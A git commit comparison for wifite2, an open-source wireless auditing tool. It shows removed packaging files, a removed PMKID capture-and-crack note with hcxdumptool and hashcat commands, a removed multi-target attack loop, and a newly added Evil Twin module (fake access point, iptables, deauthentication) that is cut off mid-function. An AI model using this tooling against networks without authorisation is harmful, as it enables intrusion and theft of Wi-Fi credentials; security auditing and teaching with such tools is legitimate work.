Compare commits
4 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
77e0da3ce7 | ||
|
|
8e46f6ac01 | ||
|
|
1dcb23659b | ||
|
|
94dd02b3ab |
4
.gitignore
vendored
4
.gitignore
vendored
@@ -5,7 +5,3 @@ hs/
|
|||||||
*.bak
|
*.bak
|
||||||
.idea/
|
.idea/
|
||||||
cracked.txt
|
cracked.txt
|
||||||
MANIFEST
|
|
||||||
dist/
|
|
||||||
build/
|
|
||||||
files.txt
|
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ FROM python:2.7.14-jessie
|
|||||||
ENV DEBIAN_FRONTEND noninteractive
|
ENV DEBIAN_FRONTEND noninteractive
|
||||||
ENV HASHCAT_VERSION hashcat-3.6.0
|
ENV HASHCAT_VERSION hashcat-3.6.0
|
||||||
|
|
||||||
# Install requirements
|
# Intall requirements
|
||||||
RUN echo "deb-src http://deb.debian.org/debian jessie main" >> /etc/apt/sources.list
|
RUN echo "deb-src http://deb.debian.org/debian jessie main" >> /etc/apt/sources.list
|
||||||
RUN apt-get update && apt-get upgrade -y
|
RUN apt-get update && apt-get upgrade -y
|
||||||
RUN apt-get install ca-certificates gcc openssl make kmod nano wget p7zip build-essential libsqlite3-dev libpcap0.8-dev libpcap-dev sqlite3 pkg-config libnl-genl-3-dev libssl-dev net-tools iw ethtool usbutils pciutils wireless-tools git curl wget unzip macchanger pyrit tshark -y
|
RUN apt-get install ca-certificates gcc openssl make kmod nano wget p7zip build-essential libsqlite3-dev libpcap0.8-dev libpcap-dev sqlite3 pkg-config libnl-genl-3-dev libssl-dev net-tools iw ethtool usbutils pciutils wireless-tools git curl wget unzip macchanger pyrit tshark -y
|
||||||
|
|||||||
@@ -1,2 +0,0 @@
|
|||||||
include README.md
|
|
||||||
include wordlist-top4800-probable.txt
|
|
||||||
33
PMKID.md
33
PMKID.md
@@ -1,33 +0,0 @@
|
|||||||
### PMKID Attack
|
|
||||||
|
|
||||||
See https://hashcat.net/forum/thread-7717.html
|
|
||||||
|
|
||||||
### Steps
|
|
||||||
|
|
||||||
1. Start `hcxdumptool` (daemon)
|
|
||||||
* `sudo hcxdumptool -i wlan1mon -o pmkid.pcapng -t 10 --enable_status=1`
|
|
||||||
* Should also use `-c <channel>`, `--filterlist` and `--filtermode` to target a specific client
|
|
||||||
* Could be a new attack type: `wifite.attack.pmkid`
|
|
||||||
2. Detect when PMKID is found.
|
|
||||||
* `hcxpcaptool -z pmkid.16800 pmkid.pcapng`
|
|
||||||
* Single-line in pmkid.16800 will have PMKID, MACAP, MACStation, ESSID (in hex).
|
|
||||||
3. Save `.16800` file (to `./hs/`? or `./pmkids/`?)
|
|
||||||
* New result type: `pmkid_result`
|
|
||||||
* Add entry to `cracked.txt`
|
|
||||||
4. Run crack attack using hashcat:
|
|
||||||
* `./hashcat64.bin --force -m 16800 -a0 -w2 path/to/pmkid.16800 path/to/wordlist.txt`
|
|
||||||
|
|
||||||
### Problems
|
|
||||||
|
|
||||||
* Requires latest hashcat to be installed. This might be in a different directory.
|
|
||||||
* Use can specify path to hashcat? Yeck...
|
|
||||||
* % hashcat -h | grep 16800
|
|
||||||
* 16800 | WPA-PMKID-PBKDF2
|
|
||||||
* If target can't be attacked... we need to detect this failure mode.
|
|
||||||
* Might need to scrape `hcxdumptool`'s output
|
|
||||||
* Look at `pmkids()` func in .bashrc
|
|
||||||
* hcxpcaptool -z OUTPUT.16800 INPUT.pcapng > /dev/null
|
|
||||||
* Check OUTPUT.16800 for the ESSID.
|
|
||||||
* Wireless adapter support is minimal, apparently.
|
|
||||||
* hcxdumptool also deauths networks and captures handshakes... maybe unnecessarily
|
|
||||||
|
|
||||||
29
README.md
29
README.md
@@ -5,31 +5,6 @@ A complete re-write of [`wifite`](https://github.com/derv82/wifite), a Python sc
|
|||||||
|
|
||||||
Wifite runs existing wireless-auditing tools for you. Stop memorizing command arguments & switches!
|
Wifite runs existing wireless-auditing tools for you. Stop memorizing command arguments & switches!
|
||||||
|
|
||||||
This version is compatible with both `python2` and `python3`.
|
|
||||||
|
|
||||||
Installation
|
|
||||||
------------
|
|
||||||
|
|
||||||
From the root directory of this package:
|
|
||||||
|
|
||||||
Run *wifite* using: `python -m wifite`
|
|
||||||
|
|
||||||
To install onto your computer (so you can just run `wifite` from any terminal), run:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
sudo python setup.py install
|
|
||||||
```
|
|
||||||
|
|
||||||
----
|
|
||||||
|
|
||||||
Note: Uninstalling is [not as easy](https://stackoverflow.com/questions/1550226/python-setup-py-uninstall#1550235). The only way to uninstall is to record the files installed by the above command and *remove* those files:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
sudo python setup.py install --record files.txt
|
|
||||||
cat files.txt | xargs sudo rm -f
|
|
||||||
sudo rm -f files.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
What's new in Wifite2?
|
What's new in Wifite2?
|
||||||
----------------------
|
----------------------
|
||||||
|
|
||||||
@@ -59,7 +34,7 @@ What's gone in Wifite2?
|
|||||||
What's not new?
|
What's not new?
|
||||||
---------------
|
---------------
|
||||||
|
|
||||||
* (Mostly) Backwards compatible with the original `wifite`'s arguments.
|
* (Mostly) Backwards compatibile with the original `wifite`'s arguments.
|
||||||
* Same text-based interface everyone knows and loves.
|
* Same text-based interface everyone knows and loves.
|
||||||
|
|
||||||
Brief Feature List
|
Brief Feature List
|
||||||
@@ -96,7 +71,7 @@ Only the latest versions of these programs are supported:
|
|||||||
* `iwconfig`: For identifying wireless devices already in Monitor Mode.
|
* `iwconfig`: For identifying wireless devices already in Monitor Mode.
|
||||||
* `ifconfig`: For starting/stopping wireless devices.
|
* `ifconfig`: For starting/stopping wireless devices.
|
||||||
* `Aircrack-ng` suite, includes:
|
* `Aircrack-ng` suite, includes:
|
||||||
* `aircrack-ng`: For cracking WEP .cap files and WPA handshake captures.
|
* `aircrack-ng`: For cracking WEP .cap files and and WPA handshake captures.
|
||||||
* `aireplay-ng`: For deauthing access points, replaying capture files, various WEP attacks.
|
* `aireplay-ng`: For deauthing access points, replaying capture files, various WEP attacks.
|
||||||
* `airmon-ng`: For enumerating and enabling Monitor Mode on wireless devices.
|
* `airmon-ng`: For enumerating and enabling Monitor Mode on wireless devices.
|
||||||
* `airodump-ng`: For target scanning & capture file generation.
|
* `airodump-ng`: For target scanning & capture file generation.
|
||||||
|
|||||||
4
TODO.md
4
TODO.md
@@ -11,7 +11,7 @@ When a dependency is not found, Wifite should walk the user through installing a
|
|||||||
|
|
||||||
The dependency-installation walkthrough should provide or auto-execute the install commands (`git clone`, `wget | tar && ./config`, etc).
|
The dependency-installation walkthrough should provide or auto-execute the install commands (`git clone`, `wget | tar && ./config`, etc).
|
||||||
|
|
||||||
Since we have a Python script for every dependency (under `wifite/tools/` or `wifite/util/`), we use Python's multiple-inheritance to achieve this.
|
Since we have a Python script for every dependency (under `wifite/tools/` or `wifite/util/`), we use Python's multiple-inheritance to achive this.
|
||||||
|
|
||||||
Requirements:
|
Requirements:
|
||||||
|
|
||||||
@@ -243,7 +243,7 @@ Not "/py":
|
|||||||
|
|
||||||
**AIRCRACK**
|
**AIRCRACK**
|
||||||
* Start aircrack-ng for WEP: Needs pcap file with IVS
|
* Start aircrack-ng for WEP: Needs pcap file with IVS
|
||||||
* Start aircrack-ng for WPA: Needs pcap file containing Handshake
|
* Start aircrack-ng for WPA: Needs pcap file containig Handshake
|
||||||
* Check status of aircrack-ng (`percenage`, `keys-tried`)
|
* Check status of aircrack-ng (`percenage`, `keys-tried`)
|
||||||
* Return cracked key
|
* Return cracked key
|
||||||
|
|
||||||
|
|||||||
5
Wifite.py
Executable file
5
Wifite.py
Executable file
@@ -0,0 +1,5 @@
|
|||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
from wifite import wifite
|
||||||
|
|
||||||
|
wifite.run()
|
||||||
@@ -1,4 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
from wifite import __main__
|
|
||||||
__main__.entry_point()
|
|
||||||
39
setup.py
39
setup.py
@@ -1,39 +0,0 @@
|
|||||||
from distutils.core import setup
|
|
||||||
|
|
||||||
from wifite.config import Configuration
|
|
||||||
|
|
||||||
setup(
|
|
||||||
name='wifite',
|
|
||||||
version=Configuration.version,
|
|
||||||
author='derv82',
|
|
||||||
author_email='derv82@gmail.com',
|
|
||||||
url='https://github.com/derv82/wifite2',
|
|
||||||
packages=[
|
|
||||||
'wifite',
|
|
||||||
'wifite/attack',
|
|
||||||
'wifite/model',
|
|
||||||
'wifite/tools',
|
|
||||||
'wifite/util',
|
|
||||||
],
|
|
||||||
data_files=[
|
|
||||||
('share/dict', ['wordlist-top4800-probable.txt'])
|
|
||||||
],
|
|
||||||
entry_points={
|
|
||||||
'console_scripts': [
|
|
||||||
'wifite = wifite.wifite:entry_point'
|
|
||||||
]
|
|
||||||
},
|
|
||||||
license='GNU GPLv2',
|
|
||||||
scripts=['bin/wifite'],
|
|
||||||
description='Wireless Network Auditor for Linux',
|
|
||||||
#long_description=open('README.md').read(),
|
|
||||||
long_description='''Wireless Network Auditor for Linux.
|
|
||||||
|
|
||||||
Cracks WEP, WPA, and WPS encrypted networks.
|
|
||||||
|
|
||||||
Depends on Aircrack-ng Suite, Tshark (from Wireshark), and various other external tools.''',
|
|
||||||
classifiers = [
|
|
||||||
"Programming Language :: Python :: 2.7",
|
|
||||||
"Programming Language :: Python :: 3"
|
|
||||||
]
|
|
||||||
)
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
|||||||
@@ -1,11 +1,10 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
sys.path.insert(0, '..')
|
sys.path.insert(0, '..')
|
||||||
|
|
||||||
from wifite.model.handshake import Handshake
|
from wifite.model.handshake import Handshake
|
||||||
from wifite.util.process import Process
|
|
||||||
|
|
||||||
import unittest
|
import unittest
|
||||||
|
|
||||||
@@ -24,29 +23,25 @@ class TestHandshake(unittest.TestCase):
|
|||||||
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
||||||
try:
|
try:
|
||||||
hs.analyze()
|
hs.analyze()
|
||||||
except Exception:
|
except Exception, e:
|
||||||
fail()
|
fail()
|
||||||
|
|
||||||
@unittest.skipUnless(Process.exists('tshark'), 'tshark is missing')
|
|
||||||
def testHandshakeTshark(self):
|
def testHandshakeTshark(self):
|
||||||
hs_file = self.getFile('handshake_exists.cap')
|
hs_file = self.getFile('handshake_exists.cap')
|
||||||
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
||||||
assert(len(hs.tshark_handshakes()) > 0)
|
assert(len(hs.tshark_handshakes()) > 0)
|
||||||
|
|
||||||
@unittest.skipUnless(Process.exists('pyrit'), 'pyrit is missing')
|
|
||||||
def testHandshakePyrit(self):
|
def testHandshakePyrit(self):
|
||||||
hs_file = self.getFile('handshake_exists.cap')
|
hs_file = self.getFile('handshake_exists.cap')
|
||||||
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
||||||
assert(len(hs.pyrit_handshakes()) > 0)
|
assert(len(hs.pyrit_handshakes()) > 0)
|
||||||
|
|
||||||
@unittest.skipUnless(Process.exists('cowpatty'), 'cowpatty is missing')
|
|
||||||
def testHandshakeCowpatty(self):
|
def testHandshakeCowpatty(self):
|
||||||
hs_file = self.getFile('handshake_exists.cap')
|
hs_file = self.getFile('handshake_exists.cap')
|
||||||
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
||||||
hs.divine_bssid_and_essid()
|
hs.divine_bssid_and_essid()
|
||||||
assert(len(hs.cowpatty_handshakes()) > 0)
|
assert(len(hs.cowpatty_handshakes()) > 0)
|
||||||
|
|
||||||
@unittest.skipUnless(Process.exists('aircrack-ng'), 'aircrack-ng is missing')
|
|
||||||
def testHandshakeAircrack(self):
|
def testHandshakeAircrack(self):
|
||||||
hs_file = self.getFile('handshake_exists.cap')
|
hs_file = self.getFile('handshake_exists.cap')
|
||||||
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from wifite.tools.airodump import Airodump
|
from wifite.tools.airodump import Airodump
|
||||||
|
|||||||
0
wifite/__init__.py
Executable file → Normal file
0
wifite/__init__.py
Executable file → Normal file
@@ -1,105 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
try:
|
|
||||||
from .config import Configuration
|
|
||||||
except (ValueError, ImportError) as e:
|
|
||||||
raise Exception('You may need to run wifite from the root directory (which includes README.md)', e)
|
|
||||||
|
|
||||||
from .util.color import Color
|
|
||||||
|
|
||||||
import os
|
|
||||||
import sys
|
|
||||||
|
|
||||||
|
|
||||||
class Wifite(object):
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
'''
|
|
||||||
Initializes Wifite. Checks for root permissions and ensures dependencies are installed.
|
|
||||||
'''
|
|
||||||
|
|
||||||
self.print_banner()
|
|
||||||
|
|
||||||
Configuration.initialize(load_interface=False)
|
|
||||||
|
|
||||||
if os.getuid() != 0:
|
|
||||||
Color.pl('{!} {R}error: {O}wifite{R} must be run as {O}root{W}')
|
|
||||||
Color.pl('{!} {R}re-run with {O}sudo{W}')
|
|
||||||
Configuration.exit_gracefully(0)
|
|
||||||
|
|
||||||
from .tools.dependency import Dependency
|
|
||||||
Dependency.run_dependency_check()
|
|
||||||
|
|
||||||
|
|
||||||
def start(self):
|
|
||||||
'''
|
|
||||||
Starts target-scan + attack loop, or launches utilities dpeending on user input.
|
|
||||||
'''
|
|
||||||
from .model.result import CrackResult
|
|
||||||
from .model.handshake import Handshake
|
|
||||||
from .util.crack import CrackHelper
|
|
||||||
|
|
||||||
if Configuration.show_cracked:
|
|
||||||
CrackResult.display()
|
|
||||||
|
|
||||||
elif Configuration.check_handshake:
|
|
||||||
Handshake.check()
|
|
||||||
|
|
||||||
elif Configuration.crack_handshake:
|
|
||||||
CrackHelper.run()
|
|
||||||
|
|
||||||
else:
|
|
||||||
Configuration.get_monitor_mode_interface()
|
|
||||||
self.scan_and_attack()
|
|
||||||
|
|
||||||
|
|
||||||
def print_banner(self):
|
|
||||||
'''Displays ASCII art of the highest caliber.'''
|
|
||||||
Color.pl(r'{G} . {GR}{D} {W}{G} . {W}')
|
|
||||||
Color.pl(r'{G}.´ · .{GR}{D} {W}{G}. · `. {G}wifite {D}%s{W}' % Configuration.version)
|
|
||||||
Color.pl(r'{G}: : : {GR}{D} (¯) {W}{G} : : : {W}{D}automated wireless auditor{W}')
|
|
||||||
Color.pl(r'{G}`. · `{GR}{D} /¯\ {W}{G}´ · .´ {C}{D}https://github.com/derv82/wifite2{W}')
|
|
||||||
Color.pl(r'{G} ` {GR}{D}/¯¯¯\{W}{G} ´ {W}')
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
|
|
||||||
def scan_and_attack(self):
|
|
||||||
'''
|
|
||||||
1) Scans for targets, asks user to select targets
|
|
||||||
2) Attacks each target
|
|
||||||
'''
|
|
||||||
from .util.scanner import Scanner
|
|
||||||
from .attack.all import AttackAll
|
|
||||||
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
# Scan
|
|
||||||
s = Scanner()
|
|
||||||
targets = s.select_targets()
|
|
||||||
|
|
||||||
# Attack
|
|
||||||
attacked_targets = AttackAll.attack_multiple(targets)
|
|
||||||
|
|
||||||
Color.pl('{+} Finished attacking {C}%d{W} target(s), exiting' % attacked_targets)
|
|
||||||
|
|
||||||
|
|
||||||
##############################################################
|
|
||||||
|
|
||||||
|
|
||||||
def entry_point():
|
|
||||||
try:
|
|
||||||
wifite = Wifite()
|
|
||||||
wifite.start()
|
|
||||||
except Exception as e:
|
|
||||||
Color.pexception(e)
|
|
||||||
Color.pl('\n{!} {R}Exiting{W}\n')
|
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
Color.pl('\n{!} {O}interrupted, shutting down...{W}')
|
|
||||||
|
|
||||||
Configuration.exit_gracefully(0)
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
entry_point()
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .util.color import Color
|
from .util.color import Color
|
||||||
@@ -9,8 +9,7 @@ class Arguments(object):
|
|||||||
''' Holds arguments used by the Wifite '''
|
''' Holds arguments used by the Wifite '''
|
||||||
|
|
||||||
def __init__(self, configuration):
|
def __init__(self, configuration):
|
||||||
# Hack: Check for -v before parsing args; so we know which commands to display.
|
self.verbose = any(['-v' in word for word in sys.argv])
|
||||||
self.verbose = '-v' in sys.argv or '-hv' in sys.argv or '-vh' in sys.argv
|
|
||||||
self.config = configuration
|
self.config = configuration
|
||||||
self.args = self.get_arguments()
|
self.args = self.get_arguments()
|
||||||
|
|
||||||
@@ -143,20 +142,26 @@ class Arguments(object):
|
|||||||
action='store',
|
action='store',
|
||||||
type=int,
|
type=int,
|
||||||
dest='num_deauths',
|
dest='num_deauths',
|
||||||
metavar='[num]',
|
metavar="[num]",
|
||||||
default=None,
|
default=None,
|
||||||
help=self._verbose('Number of deauth packets to send (default: {G}%d{W})' % self.config.num_deauths))
|
help=self._verbose('Number of deauth packets to send (default: {G}%d{W})' % self.config.num_deauths))
|
||||||
|
|
||||||
|
|
||||||
def _add_eviltwin_args(self, group):
|
def _add_eviltwin_args(self, group):
|
||||||
pass
|
group.add_argument('-et',
|
||||||
'''
|
'--eviltwin',
|
||||||
group.add_argument('--eviltwin',
|
|
||||||
action='store_true',
|
action='store_true',
|
||||||
dest='use_eviltwin',
|
dest='use_eviltwin',
|
||||||
help=Color.s('Use the "Evil Twin" attack against all targets (default: {G}off{W})'))
|
help=Color.s('Use the "Evil Twin" attack against all targets (default: {G}off{W})'))
|
||||||
# TODO: Args to specify deauth interface, server port, etc.
|
|
||||||
'''
|
group.add_argument('-eti',
|
||||||
|
'--evitwin-iface',
|
||||||
|
type=str,
|
||||||
|
dest='eviltwin_iface',
|
||||||
|
metavar='[iface]',
|
||||||
|
default=None,
|
||||||
|
help=Color.s('Wireless interface to use when creating the Fake AP (evil twin)'))
|
||||||
|
# TODO: Args to specify other options (server port, etc).
|
||||||
|
|
||||||
|
|
||||||
def _add_wep_args(self, wep):
|
def _add_wep_args(self, wep):
|
||||||
@@ -280,12 +285,6 @@ class Arguments(object):
|
|||||||
help=self._verbose('Time to wait before failing WPA attack (default: {G}%d sec{W})' % self.config.wpa_attack_timeout))
|
help=self._verbose('Time to wait before failing WPA attack (default: {G}%d sec{W})' % self.config.wpa_attack_timeout))
|
||||||
wpa.add_argument('-wpat', help=argparse.SUPPRESS, action='store', dest='wpa_attack_timeout', type=int)
|
wpa.add_argument('-wpat', help=argparse.SUPPRESS, action='store', dest='wpa_attack_timeout', type=int)
|
||||||
|
|
||||||
wpa.add_argument('--pmkid',
|
|
||||||
'-pmkid',
|
|
||||||
action='store_true',
|
|
||||||
dest='use_pmkid_only',
|
|
||||||
help=Color.s('ONLY use PMKID capture on WPA endpoints (default: {G}off{W})'))
|
|
||||||
|
|
||||||
wpa.add_argument('--new-hs',
|
wpa.add_argument('--new-hs',
|
||||||
action='store_true',
|
action='store_true',
|
||||||
dest='ignore_old_handshakes',
|
dest='ignore_old_handshakes',
|
||||||
@@ -354,7 +353,7 @@ class Arguments(object):
|
|||||||
# Alias
|
# Alias
|
||||||
wps.add_argument('-wpst', help=argparse.SUPPRESS, action='store', dest='wps_pixie_timeout', type=int)
|
wps.add_argument('-wpst', help=argparse.SUPPRESS, action='store', dest='wps_pixie_timeout', type=int)
|
||||||
|
|
||||||
# Maximum number of 'failures' (WPSFail)
|
# Maximum number of "failures" (WPSFail)
|
||||||
wps.add_argument('--wps-fails',
|
wps.add_argument('--wps-fails',
|
||||||
action='store',
|
action='store',
|
||||||
dest='wps_fail_threshold',
|
dest='wps_fail_threshold',
|
||||||
@@ -364,7 +363,7 @@ class Arguments(object):
|
|||||||
# Alias
|
# Alias
|
||||||
wps.add_argument('-wpsf', help=argparse.SUPPRESS, action='store', dest='wps_fail_threshold', type=int)
|
wps.add_argument('-wpsf', help=argparse.SUPPRESS, action='store', dest='wps_fail_threshold', type=int)
|
||||||
|
|
||||||
# Maximum number of 'timeouts'
|
# Maximum number of "timeouts"
|
||||||
wps.add_argument('--wps-timeouts',
|
wps.add_argument('--wps-timeouts',
|
||||||
action='store',
|
action='store',
|
||||||
dest='wps_timeout_threshold',
|
dest='wps_timeout_threshold',
|
||||||
|
|||||||
0
wifite/attack/__init__.py
Executable file → Normal file
0
wifite/attack/__init__.py
Executable file → Normal file
@@ -1,116 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from ..config import Configuration
|
|
||||||
from ..util.color import Color
|
|
||||||
|
|
||||||
class AttackAll(object):
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def attack_multiple(cls, targets):
|
|
||||||
'''
|
|
||||||
Attacks all given `targets` (list[wifite.model.target]) until user interruption.
|
|
||||||
Returns: Number of targets that were attacked (int)
|
|
||||||
'''
|
|
||||||
attacked_targets = 0
|
|
||||||
targets_remaining = len(targets)
|
|
||||||
for index, target in enumerate(targets, start=1):
|
|
||||||
attacked_targets += 1
|
|
||||||
targets_remaining -= 1
|
|
||||||
|
|
||||||
bssid = target.bssid
|
|
||||||
essid = target.essid if target.essid_known else '{O}ESSID unknown{W}'
|
|
||||||
|
|
||||||
Color.pl('\n{+} ({G}%d{W}/{G}%d{W})' % (index, len(targets)) +
|
|
||||||
' starting attacks against {C}%s{W} ({C}%s{W})' % (bssid, essid))
|
|
||||||
|
|
||||||
should_continue = cls.attack_single(target, targets_remaining)
|
|
||||||
if not should_continue:
|
|
||||||
break
|
|
||||||
|
|
||||||
return attacked_targets
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def attack_single(cls, target, targets_remaining):
|
|
||||||
'''
|
|
||||||
Attacks a single `target` (wifite.model.target).
|
|
||||||
Returns: True if attacks should continue, False otherwise.
|
|
||||||
'''
|
|
||||||
from .wep import AttackWEP
|
|
||||||
from .wpa import AttackWPA
|
|
||||||
from .wps import AttackWPS
|
|
||||||
from .pmkid import AttackPMKID
|
|
||||||
|
|
||||||
attacks = []
|
|
||||||
|
|
||||||
if Configuration.use_eviltwin:
|
|
||||||
# TODO: EvilTwin attack
|
|
||||||
pass
|
|
||||||
|
|
||||||
elif 'WEP' in target.encryption:
|
|
||||||
attacks.append(AttackWEP(target))
|
|
||||||
|
|
||||||
elif 'WPA' in target.encryption:
|
|
||||||
# WPA can have multiple attack vectors:
|
|
||||||
|
|
||||||
if target.wps:
|
|
||||||
# WPS
|
|
||||||
attacks.append(AttackWPS(target))
|
|
||||||
|
|
||||||
# PMKID
|
|
||||||
attacks.append(AttackPMKID(target))
|
|
||||||
|
|
||||||
# Handshake capture
|
|
||||||
attacks.append(AttackWPA(target))
|
|
||||||
|
|
||||||
if len(attacks) == 0:
|
|
||||||
Color.pl('{!} {R}Error: {O}unable to attack: encryption not WEP or WPA')
|
|
||||||
return
|
|
||||||
|
|
||||||
while len(attacks) > 0:
|
|
||||||
attack = attacks.pop(0)
|
|
||||||
try:
|
|
||||||
result = attack.run()
|
|
||||||
if result:
|
|
||||||
break # Attack was successful, stop other attacks.
|
|
||||||
except Exception as e:
|
|
||||||
Color.pexception(e)
|
|
||||||
continue
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
Color.pl('\n{!} {O}interrupted{W}\n')
|
|
||||||
if not cls.user_wants_to_continue(targets_remaining, len(attacks)):
|
|
||||||
return False # Stop attacking other targets
|
|
||||||
|
|
||||||
if attack.success:
|
|
||||||
attack.crack_result.save()
|
|
||||||
|
|
||||||
return True # Keep attacking other targets
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def user_wants_to_continue(cls, targets_remaining, attacks_remaining=0):
|
|
||||||
'''
|
|
||||||
Asks user if attacks should continue onto other targets
|
|
||||||
Returns:
|
|
||||||
True if user wants to continue, False otherwise.
|
|
||||||
'''
|
|
||||||
if attacks_remaining == 0 and targets_remaining == 0:
|
|
||||||
return # No targets or attacksleft, drop out
|
|
||||||
|
|
||||||
prompt_list = []
|
|
||||||
if attacks_remaining > 0:
|
|
||||||
prompt_list.append(Color.s('{C}%d{W} attack(s)' % attacks_remaining))
|
|
||||||
if targets_remaining > 0:
|
|
||||||
prompt_list.append(Color.s('{C}%d{W} target(s)' % targets_remaining))
|
|
||||||
prompt = ' and '.join(prompt_list)
|
|
||||||
Color.pl('{+} %s remain, do you want to continue?' % prompt)
|
|
||||||
|
|
||||||
prompt = Color.s('{+} type {G}c{W} to {G}continue{W}' +
|
|
||||||
' or {R}s{W} to {R}stop{W}: ')
|
|
||||||
|
|
||||||
from ..util.input import raw_input
|
|
||||||
if raw_input(prompt).lower().startswith('s'):
|
|
||||||
return False
|
|
||||||
else:
|
|
||||||
return True
|
|
||||||
|
|
||||||
224
wifite/attack/eviltwin.py
Normal file
224
wifite/attack/eviltwin.py
Normal file
@@ -0,0 +1,224 @@
|
|||||||
|
#!/usr/bin/python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import time
|
||||||
|
|
||||||
|
from ..model.attack import Attack
|
||||||
|
from ..tools.airodump import Airodump
|
||||||
|
from ..tools.dnsmasq import Dnsmasq
|
||||||
|
from ..tools.hostapd import Hostapd
|
||||||
|
from ..tools.ifconfig import Ifconfig
|
||||||
|
from ..tools.iptables import Iptables
|
||||||
|
from ..tools.eviltwin_server import EviltwinServer
|
||||||
|
from ..util.color import Color
|
||||||
|
from ..util.deauther import Deauther
|
||||||
|
from ..config import Configuration
|
||||||
|
|
||||||
|
class EvilTwinAttack(Attack):
|
||||||
|
'''
|
||||||
|
Monitor-mode card should be used for deauthing (packet injection).
|
||||||
|
Other card can be put into AP mode.
|
||||||
|
'''
|
||||||
|
|
||||||
|
def __init__(self, target, deauth_iface, ap_iface):
|
||||||
|
super(EvilTwinAttack, self).__init__(target)
|
||||||
|
|
||||||
|
# Args
|
||||||
|
self.target = target
|
||||||
|
self.deauth_iface = deauth_iface
|
||||||
|
self.ap_iface = ap_iface
|
||||||
|
|
||||||
|
# State
|
||||||
|
self.success = False
|
||||||
|
self.completed = False
|
||||||
|
self.crack_result = None
|
||||||
|
self.error_msg = None
|
||||||
|
|
||||||
|
# Processes
|
||||||
|
self.hostapd = None
|
||||||
|
self.dnsmasq = None
|
||||||
|
self.webserver = None
|
||||||
|
self.deauther = None
|
||||||
|
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
#raise Exception('Eviltwin attack not implemented yet, see https://github.com/derv82/wifite2/issues/81')
|
||||||
|
|
||||||
|
# Start airodump on deuath iface, wait for target, etc.
|
||||||
|
try:
|
||||||
|
|
||||||
|
with Airodump(channel=self.target.channel,
|
||||||
|
target_bssid=self.target.bssid,
|
||||||
|
skip_wps=True, # Don't check for WPS-compatibility
|
||||||
|
output_file_prefix='airodump') as airodump:
|
||||||
|
Color.clear_line()
|
||||||
|
Color.p('\r{+} {O}waiting{W} for target to appear...')
|
||||||
|
airodump_target = self.wait_for_target(airodump)
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'setting up {C}%s{W}' % self.ap_iface)
|
||||||
|
Ifconfig.up(self.ap_iface, ['10.0.0.1/24'])
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'configuring {C}iptables{W}')
|
||||||
|
self.configure_iptables(self.ap_iface)
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'enabling {C}port forwarding{W}')
|
||||||
|
self.set_port_forwarding(enabled=True)
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'starting {C}hostapd{W} on {C}%s{W}' % self.ap_iface)
|
||||||
|
self.hostapd = Hostapd(self.target, self.ap_iface)
|
||||||
|
self.hostapd.start()
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'starting {C}dnsmasq{W} on {C}%s{W}' % self.ap_iface)
|
||||||
|
self.dnsmasq = Dnsmasq(self.ap_iface)
|
||||||
|
self.dnsmasq.start()
|
||||||
|
Color.clear_entire_line()
